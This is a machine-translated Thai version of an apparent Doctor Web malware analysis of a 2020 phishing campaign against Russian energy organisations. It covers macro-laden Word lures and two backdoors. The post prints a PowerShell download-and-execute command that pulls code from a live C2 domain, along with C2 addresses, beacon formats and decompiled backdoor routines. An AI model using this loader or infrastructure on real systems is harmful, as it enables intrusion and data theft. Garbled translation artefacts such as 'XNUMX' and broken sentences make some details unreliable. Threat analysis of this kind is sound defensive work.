ประสบการณ์ของเราในการตรวจสอบเหตุการณ์ด้านความปลอดภัยของคอมพิวเตอร์แสดงให้เห็นว่าอีเมลยังคงเป็นหนึ่งในช่องทางทั่วไปที่ผู้โจมตีใช้เพื่อเจาะโครงสร้างพื้นฐานเครือข่ายที่ถูกโจมตีในขั้นต้น การกระทำที่ประมาทด้วยจดหมายที่น่าสงสัย (หรือไม่น่าสงสัย) กลายเป็นจุดเริ่มต้นสำหรับการติดเชื้อเพิ่มเติม ซึ่งเป็นสาเหตุที่อาชญากรไซเบอร์ใช้วิธีการวิศวกรรมสังคมอย่างแข็งขัน แม้ว่าจะมีระดับความสำเร็จที่แตกต่างกันก็ตาม
ในโพสต์นี้ เราต้องการพูดคุยเกี่ยวกับการสอบสวนล่าสุดของเราเกี่ยวกับแคมเปญสแปมที่กำหนดเป้าหมายไปยังองค์กรจำนวนมากในศูนย์เชื้อเพลิงและพลังงานของรัสเซีย การโจมตีทั้งหมดเป็นไปตามสถานการณ์เดียวกันโดยใช้อีเมลปลอม และดูเหมือนจะไม่มีใครใช้ความพยายามมากนักกับเนื้อหาข้อความในอีเมลเหล่านี้
หน่วยสืบราชการลับ
ทุกอย่างเริ่มต้นเมื่อปลายเดือนเมษายน 2020 เมื่อนักวิเคราะห์ไวรัส Doctor Web ตรวจพบแคมเปญสแปมที่แฮกเกอร์ส่งสมุดโทรศัพท์ที่อัปเดตไปยังพนักงานขององค์กรหลายแห่งในศูนย์เชื้อเพลิงและพลังงานของรัสเซีย แน่นอนว่านี่ไม่ใช่การแสดงความกังวลง่ายๆ เนื่องจากไดเร็กทอรีนั้นไม่มีอยู่จริง และเอกสาร .docx ได้ดาวน์โหลดรูปภาพสองภาพจากแหล่งข้อมูลระยะไกล
หนึ่งในนั้นถูกดาวน์โหลดไปยังคอมพิวเตอร์ของผู้ใช้จากเซิร์ฟเวอร์ news[.]zannews[.]com เป็นที่น่าสังเกตว่าชื่อโดเมนนั้นคล้ายคลึงกับโดเมนของศูนย์สื่อต่อต้านการทุจริตของคาซัคสถาน - zannews[.]kz ในทางกลับกัน โดเมนที่ใช้นั้นชวนให้นึกถึงแคมเปญอื่นในปี 2015 ที่รู้จักกันในชื่อ TOPNEWS ซึ่งใช้แบ็คดอร์ ICEFOG และมีโดเมนควบคุมโทรจันโดยมีสตริงย่อย “news” อยู่ในชื่อ คุณสมบัติที่น่าสนใจอีกประการหนึ่งคือเมื่อส่งอีเมลไปยังผู้รับที่แตกต่างกัน คำขอดาวน์โหลดรูปภาพจะใช้พารามิเตอร์คำขอที่แตกต่างกันหรือชื่อรูปภาพที่ไม่ซ้ำใคร
เราเชื่อว่าสิ่งนี้ทำขึ้นเพื่อจุดประสงค์ในการรวบรวมข้อมูลเพื่อระบุผู้รับที่ "เชื่อถือได้" ซึ่งจะรับประกันว่าจะเปิดจดหมายในเวลาที่เหมาะสม โปรโตคอล SMB ใช้เพื่อดาวน์โหลดอิมเมจจากเซิร์ฟเวอร์ตัวที่สอง ซึ่งสามารถทำได้เพื่อรวบรวมแฮช NetNTLM จากคอมพิวเตอร์ของพนักงานที่เปิดเอกสารที่ได้รับ
และนี่คือจดหมายที่มีไดเร็กทอรีปลอม:
ในเดือนมิถุนายนของปีนี้ แฮกเกอร์เริ่มใช้ชื่อโดเมนใหม่ sports[.]manhajnews[.]com เพื่ออัปโหลดภาพ การวิเคราะห์แสดงให้เห็นว่าโดเมนย่อย manhajnews[.]com ถูกใช้ในการส่งจดหมายขยะตั้งแต่อย่างน้อยกันยายน 2019 เป้าหมายประการหนึ่งของแคมเปญนี้คือมหาวิทยาลัยขนาดใหญ่ในรัสเซีย
นอกจากนี้ ภายในเดือนมิถุนายน ฝ่ายจัดการการโจมตีได้เขียนข้อความใหม่สำหรับจดหมายของพวกเขา โดยคราวนี้เอกสารดังกล่าวมีข้อมูลเกี่ยวกับการพัฒนาอุตสาหกรรม ข้อความในจดหมายระบุอย่างชัดเจนว่าผู้เขียนไม่ใช่เจ้าของภาษารัสเซียหรือจงใจสร้างความประทับใจเกี่ยวกับตัวเขาเอง น่าเสียดายที่แนวคิดในการพัฒนาอุตสาหกรรมเช่นเคยกลับกลายเป็นเพียงหน้าปก - เอกสารดาวน์โหลดรูปภาพสองภาพอีกครั้ง ในขณะที่เซิร์ฟเวอร์เปลี่ยนเป็นดาวน์โหลด[.]inklingpaper[.]com
นวัตกรรมถัดไปตามมาในเดือนกรกฎาคม ในความพยายามที่จะเลี่ยงการตรวจจับเอกสารที่เป็นอันตรายโดยโปรแกรมป้องกันไวรัส ผู้โจมตีจึงเริ่มใช้เอกสาร Microsoft Word ที่เข้ารหัสด้วยรหัสผ่าน ในเวลาเดียวกัน ผู้โจมตีตัดสินใจใช้เทคนิควิศวกรรมสังคมแบบคลาสสิก - การแจ้งเตือนรางวัล
ข้อความอุทธรณ์ถูกเขียนอีกครั้งในรูปแบบเดียวกันซึ่งกระตุ้นให้เกิดความสงสัยเพิ่มเติมในหมู่ผู้รับ เซิร์ฟเวอร์สำหรับดาวน์โหลดรูปภาพก็ไม่เปลี่ยนแปลงเช่นกัน
โปรดทราบว่าในทุกกรณี กล่องจดหมายอิเล็กทรอนิกส์ที่ลงทะเบียนในโดเมน mail[.]ru และ yandex[.]ru ใช้ในการส่งจดหมาย
โจมตี
ภายในต้นเดือนกันยายน 2020 ถึงเวลาดำเนินการแล้ว นักวิเคราะห์ไวรัสของเราบันทึกการโจมตีระลอกใหม่ โดยผู้โจมตีส่งจดหมายอีกครั้งโดยอ้างว่าจะอัปเดตสมุดโทรศัพท์ อย่างไรก็ตาม คราวนี้ไฟล์แนบมีมาโครที่เป็นอันตราย
เมื่อเปิดเอกสารที่แนบมา มาโครจะสร้างไฟล์ขึ้นมา XNUMX ไฟล์:
- สคริปต์ VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs ซึ่งมีจุดประสงค์เพื่อเปิดไฟล์แบตช์
- ไฟล์แบตช์นั้นเอง %APPDATA%configstest.bat ซึ่งทำให้สับสน
สาระสำคัญของงานอยู่ที่การเปิดตัวเชลล์ Powershell ด้วยพารามิเตอร์บางอย่าง พารามิเตอร์ที่ส่งผ่านไปยังเชลล์จะถูกถอดรหัสเป็นคำสั่ง:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;จากคำสั่งที่แสดงดังต่อไปนี้ โดเมนที่ใช้ดาวน์โหลดเพย์โหลดจะถูกปลอมแปลงเป็นไซต์ข่าวอีกครั้ง แบบเรียบง่าย ซึ่งมีหน้าที่เพียงอย่างเดียวคือรับเชลล์โค้ดจากเซิร์ฟเวอร์คำสั่งและการควบคุมและดำเนินการ เราสามารถระบุแบ็คดอร์ได้สองประเภทที่สามารถติดตั้งบนพีซีของเหยื่อได้
ประตูหลัง.Siggen2.3238
อันแรกคือ ประตูหลัง.Siggen2.3238 — ผู้เชี่ยวชาญของเราไม่เคยพบมาก่อนและไม่มีการกล่าวถึงโปรแกรมนี้จากผู้จำหน่ายแอนตี้ไวรัสรายอื่น
โปรแกรมนี้เป็นแบ็คดอร์ที่เขียนด้วยภาษา C++ และทำงานบนระบบปฏิบัติการ Windows 32 บิต
ประตูหลัง.Siggen2.3238 สามารถสื่อสารกับเซิร์ฟเวอร์การจัดการโดยใช้สองโปรโตคอล: HTTP และ HTTPS ตัวอย่างที่ทดสอบใช้โปรโตคอล HTTPS User-Agent ต่อไปนี้ใช้ในการร้องขอไปยังเซิร์ฟเวอร์:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
ในกรณีนี้ คำขอทั้งหมดจะมาพร้อมกับชุดพารามิเตอร์ต่อไปนี้:
%s;type=%s;length=%s;realdata=%send
โดยที่แต่ละบรรทัด %s จะถูกแทนที่ด้วย:
- ID ของคอมพิวเตอร์ที่ติดไวรัส
- ประเภทของคำขอที่ถูกส่ง
- ความยาวของข้อมูลในฟิลด์ realdata
- ข้อมูล.
ในขั้นตอนการรวบรวมข้อมูลเกี่ยวกับระบบที่ติดไวรัส ประตูหลังจะสร้างบรรทัดดังนี้:
lan=%s;cmpname=%s;username=%s;version=%s;
โดยที่ lan คือที่อยู่ IP ของคอมพิวเตอร์ที่ติดไวรัส cmpname คือชื่อคอมพิวเตอร์ ชื่อผู้ใช้คือชื่อผู้ใช้ เวอร์ชันคือบรรทัด 0.0.4.03
ข้อมูลนี้พร้อมตัวระบุ sysinfo จะถูกส่งผ่านคำขอ POST ไปยังเซิร์ฟเวอร์ควบคุมที่ https[:]//31.214[.]157.14/log.txt ถ้าเป็นการตอบโต้. ประตูหลัง.Siggen2.3238 รับสัญญาณ HEART ถือว่าการเชื่อมต่อสำเร็จ และประตูหลังเริ่มวงจรหลักของการสื่อสารกับเซิร์ฟเวอร์
คำอธิบายหลักการทำงานที่สมบูรณ์ยิ่งขึ้น ประตูหลัง.Siggen2.3238 อยู่ในของเรา .
BackDoor.Whitebird.23
โปรแกรมที่สองเป็นการดัดแปลงแบ็คดอร์ BackDoor.Whitebird ซึ่งเราทราบแล้วจากเหตุการณ์ที่เกิดขึ้นกับหน่วยงานของรัฐในคาซัคสถาน เวอร์ชันนี้เขียนด้วยภาษา C++ และได้รับการออกแบบมาให้ทำงานบนระบบปฏิบัติการ Windows ทั้งแบบ 32 บิตและ 64 บิต
เช่นเดียวกับโปรแกรมส่วนใหญ่ประเภทนี้ BackDoor.Whitebird.23 ออกแบบมาเพื่อสร้างการเชื่อมต่อที่เข้ารหัสกับเซิร์ฟเวอร์ควบคุมและการควบคุมคอมพิวเตอร์ที่ติดไวรัสโดยไม่ได้รับอนุญาต ติดตั้งในระบบที่ถูกบุกรุกโดยใช้หยด .
ตัวอย่างที่เราตรวจสอบคือไลบรารีที่เป็นอันตรายซึ่งมีการส่งออก XNUMX รายการ:
- Google Play
- ทดสอบ
ในช่วงเริ่มต้นของการทำงาน ระบบจะถอดรหัสการกำหนดค่าที่เดินสายเข้าไปในตัวประตูหลังโดยใช้อัลกอริธึมตามการดำเนินการ XOR ด้วยไบต์ 0x99 การกำหนดค่าดูเหมือนว่า:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
เพื่อให้แน่ใจว่าการทำงานจะคงที่ ประตูหลังจะเปลี่ยนค่าที่ระบุในฟิลด์ ชั่วโมงทำงาน การกำหนดค่า ฟิลด์นี้มีขนาด 1440 ไบต์ ซึ่งรับค่า 0 หรือ 1 และเป็นตัวแทนแต่ละนาทีของแต่ละชั่วโมงในวันนั้น สร้างเธรดแยกต่างหากสำหรับแต่ละอินเทอร์เฟซเครือข่ายที่ฟังอินเทอร์เฟซและค้นหาแพ็กเก็ตการอนุญาตบนพร็อกซีเซิร์ฟเวอร์จากคอมพิวเตอร์ที่ติดไวรัส เมื่อตรวจพบแพ็กเก็ตดังกล่าว ประตูหลังจะเพิ่มข้อมูลเกี่ยวกับพร็อกซีเซิร์ฟเวอร์ลงในรายการ นอกจากนี้ ตรวจสอบการมีอยู่ของพรอกซีผ่าน WinAPI InternetQueryOptionW.
โปรแกรมจะตรวจสอบนาทีและชั่วโมงปัจจุบันและเปรียบเทียบกับข้อมูลในภาคสนาม ชั่วโมงทำงาน การกำหนดค่า หากค่าสำหรับนาทีที่สอดคล้องกันของวันไม่เป็นศูนย์ แสดงว่าการเชื่อมต่อกับเซิร์ฟเวอร์ควบคุมถูกสร้างขึ้น
การสร้างการเชื่อมต่อกับเซิร์ฟเวอร์จะจำลองการสร้างการเชื่อมต่อโดยใช้โปรโตคอล TLS เวอร์ชัน 1.0 ระหว่างไคลเอนต์และเซิร์ฟเวอร์ เนื้อความของประตูหลังประกอบด้วยบัฟเฟอร์สองตัว
บัฟเฟอร์แรกประกอบด้วยแพ็กเก็ต TLS 1.0 Client Hello
บัฟเฟอร์ที่สองประกอบด้วยแพ็กเก็ต TLS 1.0 Client Key Exchange ที่มีความยาวคีย์ 0x100 ไบต์, Change Cipher Spec, Encrypted Handshake Message
เมื่อส่งแพ็กเก็ต Client Hello ประตูหลังจะเขียนข้อมูลเวลาปัจจุบัน 4 ไบต์และข้อมูลสุ่มเทียม 28 ไบต์ในช่อง Client Random โดยคำนวณดังนี้:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
แพ็กเก็ตที่ได้รับจะถูกส่งไปยังเซิร์ฟเวอร์ควบคุม การตรวจสอบการตอบสนอง (แพ็กเก็ต Server Hello):
- การปฏิบัติตามโปรโตคอล TLS เวอร์ชัน 1.0;
- ความสอดคล้องของการประทับเวลา (4 ไบต์แรกของฟิลด์แพ็กเก็ตข้อมูลสุ่ม) ที่ระบุโดยไคลเอนต์กับการประทับเวลาที่ระบุโดยเซิร์ฟเวอร์
- ตรงกับ 4 ไบต์แรกหลังการประทับเวลาในฟิลด์ Random Data ของไคลเอ็นต์และเซิร์ฟเวอร์
ในกรณีที่ระบุตรงกัน ประตูหลังจะเตรียมแพ็กเก็ต Client Key Exchange ในการดำเนินการนี้ จะต้องแก้ไขคีย์สาธารณะในแพ็คเกจ Client Key Exchange รวมถึง Encryption IV และข้อมูลการเข้ารหัสในแพ็คเกจ Encrypted Handshake Message
จากนั้นแบ็คดอร์จะได้รับแพ็กเก็ตจากเซิร์ฟเวอร์คำสั่งและการควบคุม ตรวจสอบว่าเวอร์ชันโปรโตคอล TLS เป็น 1.0 จากนั้นยอมรับอีก 54 ไบต์ (เนื้อความของแพ็กเก็ต) เสร็จสิ้นการตั้งค่าการเชื่อมต่อ
คำอธิบายหลักการทำงานที่สมบูรณ์ยิ่งขึ้น BackDoor.Whitebird.23 อยู่ในของเรา .
บทสรุปและบทสรุป
การวิเคราะห์เอกสาร มัลแวร์ และโครงสร้างพื้นฐานที่ใช้ทำให้เราสามารถพูดได้อย่างมั่นใจว่าการโจมตีนี้จัดทำโดยกลุ่ม APT ของจีน เมื่อพิจารณาถึงการทำงานของแบ็คดอร์ที่ติดตั้งบนคอมพิวเตอร์ของเหยื่อในกรณีที่การโจมตีสำเร็จ การติดเชื้อนำไปสู่การขโมยข้อมูลที่เป็นความลับจากคอมพิวเตอร์ขององค์กรที่ถูกโจมตีเป็นอย่างน้อย
นอกจากนี้ สถานการณ์ที่เป็นไปได้มากคือการติดตั้งโทรจันพิเศษบนเซิร์ฟเวอร์ภายในที่มีฟังก์ชันพิเศษ สิ่งเหล่านี้อาจเป็นตัวควบคุมโดเมน เมลเซิร์ฟเวอร์ เกตเวย์อินเทอร์เน็ต ฯลฯ ดังที่เราเห็นในตัวอย่าง เซิร์ฟเวอร์ดังกล่าวเป็นที่สนใจของผู้โจมตีเป็นพิเศษด้วยเหตุผลหลายประการ
ที่มา: will.com